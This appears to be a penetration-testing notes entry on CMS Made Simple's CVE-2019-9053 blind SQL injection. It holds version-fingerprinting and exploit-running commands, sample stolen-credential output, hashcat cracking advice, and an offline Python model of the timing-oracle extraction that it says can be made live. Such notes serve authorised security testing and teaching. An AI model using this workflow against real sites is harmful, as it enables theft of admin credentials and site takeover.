CMS Made Simple
What it is: Lightweight PHP CMS for small websites. Best known for an unauthenticated time-based blind SQL injection (CVE-2019-9053) in the News module of versions before 2.2.10; it lets an attacker read the admin username, email, password hash and salt from the database. Passwords are stored as md5(salt + password), so the hash is cheap to crack offline.
Default ports: 80, 443
Vuln research:
Identify version
Check /doc/CHANGELOG.txt — newest release is listed first, so the top of the file gives the installed version. Anything below 2.2.10 is a candidate for the SQLi; if the file has been removed, fall back to the admin login page or module file timestamps.
curl -s http://$IP/doc/CHANGELOG.txt | head -10
SQLi (CVE-2019-9053)
Unauthenticated time-based blind SQLi in the News module (m1_idlist parameter) on CMS Made Simple < 2.2.10 — dumps the admin user's username, email, salt and MD5 password hash. The public exploit is EDB-ID 46635 (a Python 2 script; python3 ports circulate as cmsms_sqli.py). Because it is time-based it extracts one character per request and is slow; on a laggy link raise the sleep value in the script or results will be garbled.
python3 cmsms_sqli.py -u http://$IP/ --crack -w /usr/share/wordlists/rockyou.txt
Example Output
[+] Salt for password found: xxxxxxxx
[+] Username found: admin
[+] Email found: admin@site.com
[+] Password found: SuperSecret
Without --crack you get the raw MD5 hash and the salt. Since the scheme is md5(salt + password), crack it offline with hashcat mode 20 (md5($salt.$pass)) using the hash:salt input format, which is far faster than the script's built-in cracker for large wordlists.
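To make clear what the exploit actually does, here is an added offline model of its two steps (this is not the EDB script and not CMS Made Simple code): character-by-character extraction through a time-based oracle, and offline cracking of the recovered md5(salt + password) hash. The HTTP request is replaced by a simulated timed request against constructed sample data (salt, username, hash), and the injected payload itself is not reproduced; the oracle only models the "LIKE 'prefix%' then SLEEP(n)" behaviour the real attack relies on.

```python
"""Offline model of the CVE-2019-9053 exploit flow (added example, not the
public script): 1) time-based blind extraction of one value at a time,
2) cracking of CMS Made Simple's md5(salt + password) hash.
No network access: the target is simulated below with constructed data."""
import hashlib
from typing import Callable, Dict, Iterable, Optional

# Constructed stand-in for cms_siteprefs.sitemask and the cms_users row the
# real exploit reads. Not taken from any real installation.
SALT = "ab12cd34"
PASSWORD = "SuperSecret"
STORED_HASH = hashlib.md5((SALT + PASSWORD).encode()).hexdigest()
SECRETS: Dict[str, str] = {
    "sitemask": SALT,
    "username": "admin",
    "email": "admin@site.com",
    "password": STORED_HASH,
}

# Seconds injected into SLEEP(); a response at least this slow means "match".
# On a high-latency link this must be raised, or noise produces wrong chars.
SLEEP_SECONDS = 2.0
# Lowercase hex covers the hash and salt; the rest covers typical usernames
# and emails. '_' and '%' are deliberately excluded because they are LIKE
# wildcards and would need escaping in a real payload.
CHARSET = "0123456789abcdefghijklmnopqrstuvwxyz@.-"


def simulated_timed_request(column: str, prefix: str) -> float:
    """Stand-in for one HTTP request carrying a payload of the form
    ... AND (SELECT SLEEP(n) FROM t WHERE <column> LIKE '<prefix>%') ...
    Returns a simulated response time in seconds. Comparison is lower-cased
    because MySQL's default collation makes LIKE case-insensitive."""
    baseline = 0.15  # normal round trip
    matches = SECRETS[column].lower().startswith(prefix.lower())
    return baseline + (SLEEP_SECONDS if matches else 0.0)


def make_oracle(column: str,
                timed_request: Callable[[str, str], float] = simulated_timed_request,
                threshold: float = SLEEP_SECONDS) -> Callable[[str], bool]:
    """Turn response timing into a boolean oracle: 'does the value start with
    this prefix?'. Swap timed_request for a real HTTP call to use it live."""
    def oracle(prefix: str) -> bool:
        return timed_request(column, prefix) >= threshold
    return oracle


def extract(oracle: Callable[[str], bool], charset: str = CHARSET,
            max_len: int = 64) -> str:
    """Recover a value one character at a time. Each round tries every
    candidate appended to the confirmed prefix; when none matches the value
    is complete. Cost is O(len(value) * len(charset)) requests, which is why
    the real exploit is slow."""
    found = ""
    for _ in range(max_len):
        for ch in charset:
            if oracle(found + ch):
                found += ch
                break
        else:
            return found  # no candidate extended the prefix: done
    return found


def crack(salt: str, target_hash: str, wordlist: Iterable[str]) -> Optional[str]:
    """CMS Made Simple stores md5(sitemask + password); try each candidate."""
    for word in wordlist:
        word = word.rstrip("\r\n")
        if hashlib.md5((salt + word).encode()).hexdigest() == target_hash:
            return word
    return None


def run_offline_demo() -> Dict[str, Optional[str]]:
    """Mirror the script's --crack flow against the simulated target."""
    salt = extract(make_oracle("sitemask"))
    user = extract(make_oracle("username"))
    email = extract(make_oracle("email"))
    pw_hash = extract(make_oracle("password"))
    wordlist = ["password", "letmein", "SuperSecret", "admin123"]  # constructed
    return {"salt": salt, "username": user, "email": email,
            "hash": pw_hash, "password": crack(salt, pw_hash, wordlist)}


if __name__ == "__main__":
    for key, value in run_offline_demo().items():
        print(f"[+] {key}: {value}")
```

The oracle/extract split is the part worth keeping: against a live target only `simulated_timed_request` changes, and the threshold is what you tune when responses become noisy. Note that the case-insensitive LIKE means a username with uppercase letters comes back lower-cased; the hash and salt are unaffected since they are lowercase hex.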